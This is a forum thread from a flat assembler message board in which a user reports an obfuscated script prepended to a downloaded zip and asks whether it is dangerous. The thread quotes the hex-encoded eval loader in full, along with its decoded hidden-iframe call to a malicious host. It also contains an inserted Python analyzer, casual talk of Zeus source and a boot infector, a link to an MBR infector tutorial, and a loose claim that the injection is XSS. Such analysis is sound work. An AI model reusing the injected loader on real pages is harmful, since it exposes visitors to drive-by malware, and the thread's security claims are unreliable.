flat assembler
Message board for the users of flat assembler.

Thread: js.iframe - winasm.net dlg2fasm
yoshimitsu
Joined: 07 Jul 2011
Posts: 96
Hi,
so I downloaded dlg2fasm.zip some weeks ago from winasm.net, and NOD32 just threw some message about it, which is why I uploaded it to VT:
http://www.virustotal.com/file-scan/report.html?id=787097dada05424612d4c47a42024d3dd2c249187b0950a4c9acf9bee353f0ce-1312518265

Before the actual zip-package the file contains this:
Quote:
<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f696e6e65737370686f746f2e636f6d2f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>


<br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /home/winasm/public_html/index.php:1) in <b>/home/winasm/public_html/mkportal/modules/downloads/index.php</b> on line <b>2259</b><br />
<br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /home/winasm/public_html/index.php:1) in <b>/home/winasm/public_html/mkportal/modules/downloads/index.php</b> on line <b>2261</b><br />
<br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /home/winasm/public_html/index.php:1) in <b>/home/winasm/public_html/mkportal/modules/downloads/index.php</b> on line <b>2263</b><br />
<br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /home/winasm/public_html/index.php:1) in <b>/home/winasm/public_html/mkportal/modules/downloads/index.php</b> on line <b>2265</b><br />
<br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /home/winasm/public_html/index.php:1) in <b>/home/winasm/public_html/mkportal/modules/downloads/index.php</b> on line <b>2267</b><br />

which hex-decodes to:
Quote:
document.write('<iframe src="http://innessphoto.com/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')


As I'm neither that familiar with JavaScript nor with security, I'm wondering if this could be harmful in any way:
1. Can this even be executed from inside a zip package?..
2. Is this even harmful at all? I mean, I just tried to visit that URL; could something happen, or isn't it just some webpage?

This may sound kind of naive, but at the moment I have tons of stuff on my HD without backups, so I guessed it'd be better to ask..
Post 05 Aug 2011, 04:56
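A way to check a download like this from the defender's side, as an added example that is not code from the thread: it takes whatever precedes the first ZIP local-file header, decodes the hex string literals of any prepended script the way the script's own loop does (without the eval), flags 1x1 iframes, and confirms that the archive itself still opens, because an archiver never executes that prefix; only a browser rendering the bytes as HTML would. The sample file is constructed inside the block.

```python
import io
import re
import zipfile

# Constructed sample: a hex-encoded document.write() like the one in the post,
# wrapped in <script> and prepended to a tiny ZIP built in memory.
INJECTED_JS = ('document.write(\'<iframe src="http://innessphoto.com/forum.php?tp='
               '675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>\')')
HEX_LITERAL_RE = re.compile(r'"([0-9a-fA-F]{16,})"')   # long hex string literals
IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.IGNORECASE)
ATTR_RE = re.compile(r'(\w+)="([^"]*)"')

def build_sample():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("dlg2fasm/readme.txt", "placeholder archive content\n")
    script = ('<script>var t="";var arr="' + INJECTED_JS.encode().hex() +
              '";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt('
              'arr[i]+arr[i+1],16));eval(t);</script>\n')
    return script.encode() + buf.getvalue()

def decode_hex_literals(text):
    # Same transformation the script's loop performs, minus the eval().
    out = []
    for h in HEX_LITERAL_RE.findall(text):
        if len(h) % 2 == 0:     # odd-length runs cannot be a byte string
            out.append(bytes.fromhex(h).decode("latin-1"))
    return out

def find_iframes(markup):
    # 0/1-pixel frames pointing at a remote src are the classic drive-by pattern.
    found = []
    for attrs in IFRAME_RE.findall(markup):
        a = dict(ATTR_RE.findall(attrs))
        a["hidden"] = a.get("width") in ("0", "1") and a.get("height") in ("0", "1")
        found.append(a)
    return found

def analyse(data):
    # Everything before the first local file header was prepended by the server.
    off = data.find(b"PK\x03\x04")
    prefix = data[:max(off, 0)]
    iframes = []
    for js in decode_hex_literals(prefix.decode("latin-1")):
        iframes.extend(find_iframes(js))
    # zipfile finds the central directory from the end of the file, so leading
    # junk does not stop the archive from opening and nothing in it is executed.
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        members = zf.namelist()
    return {"prefix_len": len(prefix), "iframes": iframes, "members": members}
```

The same split applies to the real download: compare the prefix length with the offset of the first PK signature, and the decoded prefix with what the PHP warnings point at (output starting at index.php line 1 on the server).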
typedef
Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
XSS is what they were trying to do. That's a session hijacking technique right there. But I wonder why it's encrypted and in a zip file. Whatever they were trying to accomplish, they did not want you to see it.
Post 05 Aug 2011, 06:20
typedef
Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
I think.
Post 05 Aug 2011, 06:21
Overflowz
Joined: 03 Sep 2010
Posts: 1046
Look: http://www.malwareurl.com/listing.php?domain=innessphoto.com It's a Zeus botnet exploit page or something like that.
Post 05 Aug 2011, 12:57
typedef
Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
Hehehe, I know who wrote ZEUS. I have its source code too.....

It's bad news.

Good find, dude.

@Overflowz so all that encryption stuff, you were building a crypter/binder for your Zeus? Laughing
Post 05 Aug 2011, 13:21
Overflowz
Joined: 03 Sep 2010
Posts: 1046
@typedef
No way, I'm not a "malware user". I just gave information about that site. I'm going to be a security professional, so don't blame things like that on me.
I know who wrote Zeus too and have the source code also, to understand its actions and the security things it does. Malware is the best way to study; it gives new and different ideas, and of course I'm learning much from it.
Post 05 Aug 2011, 17:03
typedef
Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
Well, I am.
Yesterday I made a boot infector on my PC and I had to boot from the XP disk lol.......
Post 05 Aug 2011, 19:32
Overflowz
Joined: 03 Sep 2010
Posts: 1046
A boot infector from Ring3? WHAT?! Or do you mean a device driver?
I need some lessons about drivers.. I can't learn C!
Post 06 Aug 2011, 00:09
typedef
Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
Overflowz wrote:
boot infector from Ring3 ? WHAT ?! or you mean device driver ?


https://opensc.ws/tutorials-articles/15922-windows-master-boot-record-infector-corruptor.html#post139319

Overflowz wrote:
I need some lessons about drivers.. I can't learn C !

That would mean converting WinDDK header files to ASM .INC files, which I don't think could ever happen and would be twice plus 10 times harder than just learning C. Very Happy
Post 06 Aug 2011, 04:24
Overflowz
Joined: 03 Sep 2010
Posts: 1046
typedef
Sigh.. Windows gives you access to the MBR from ring3? EH?!
Post 06 Aug 2011, 12:20
typedef
Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
Yep. And I have the power to replace the bootstrap code with my own. Hold on, I'll show you the dump from the first byte 'jmp 0000:7c54' to the last word '0xaa55'.
Post 06 Aug 2011, 14:43
Overflowz
Joined: 03 Sep 2010
Posts: 1046
I know how to read the MBR. I have written a program for dumping the MBR, but I didn't think Windows could access it for writing.. kewl, strange.
Post 06 Aug 2011, 15:44
typedef
Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
If Windows 7 doesn't let you, you can add a manifest file to give it your "loyalness".
Post 06 Aug 2011, 16:03
Overflowz
Joined: 03 Sep 2010
Posts: 1046
I don't want to destroy the MBR.. It's useless. Anyway, I'm going to learn kernel mode assembly from OSDev right now.
edit:
Can I write drivers with interrupts? For example:
Code:
format PE native dll 4.0
include 'win32a.inc'
entry driverentry
section '.data' data readable writeable notpageable
something db "hai world","$"
section '.text' code readable executable notpageable
driverentry:
mov ah,09
mov dx,something
int 0x21
...    

I really don't understand what IN and OUT do and how it finds ports, sending signals or something.. It's hard Sad I need full disclosure about it.
Post 06 Aug 2011, 16:07
typedef
Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
How to read the date from CMOS.
Code:
mov dx,70h      ; CMOS address port
mov al,7        ; register 7 = day of month
out dx,al       ; select the register
inc dx          ; dx = 71h, CMOS data port
in al,dx        ; read the selected register (BCD on most machines)
ret

al = today's date, i.e. for me it's 6
Post 06 Aug 2011, 17:25
Overflowz
Joined: 03 Sep 2010
Posts: 1046
typedef
I know what the IN and OUT instructions look like, but I don't know what they do. And also, why "mov dx,70h" to get the current date? That's what I'm asking: where should I get ports from and how do I control them? I need full information about that.
Post 06 Aug 2011, 19:17
typedef
Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
Post 06 Aug 2011, 22:28
Overflowz
Joined: 03 Sep 2010
Posts: 1046
Still, I don't get it. How can I, for example, create a file on disk with drivers? I don't have any idea how to do it when working only with ports like IN and OUT.. or maybe the HDD has its own programming or something like that?
Post 06 Aug 2011, 23:59
typedef
Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
Overflowz wrote:
still, I don't get it. How can I, for example create file on disk with drivers ? I don't have any idea how to do it when working only with ports like IN and OUT.. or maybe HDD has it's own programming or something like that?


Your driver is running in real mode.

Your p-mode program tells your driver to create a file or, in general, write a block of data to a specific data block on the drive (i.e. using int 80h).
Your R-mode driver then looks up your file table structure for that file (i.e. which cluster it is located on, or whether there is such a file),

and so on...

Get it?

When you copy a file to another drive and then the OS says there's no space, the space is there; it's just that the OS doesn't want you to overwrite the other files' data. That's why in some cases you can recover deleted files by reading the Master File Table ($MFT) and the like, because the data is still there but marked as not needed.

It's complicated, man.
Post 07 Aug 2011, 00:29
Overflowz
Joined: 03 Sep 2010
Posts: 1046
Sounds really mysterious Smile I must learn more about these things! I'm going to find some teacher here if I'm lucky, because believe it or not, in my country nobody is even interested in assembly language, and I don't have to say things like this, what interrupts are and so on)) Thanks for the info anyway. Smile
Post 07 Aug 2011, 01:29
Copyright © 1999-2020, Tomasz Grysztar.
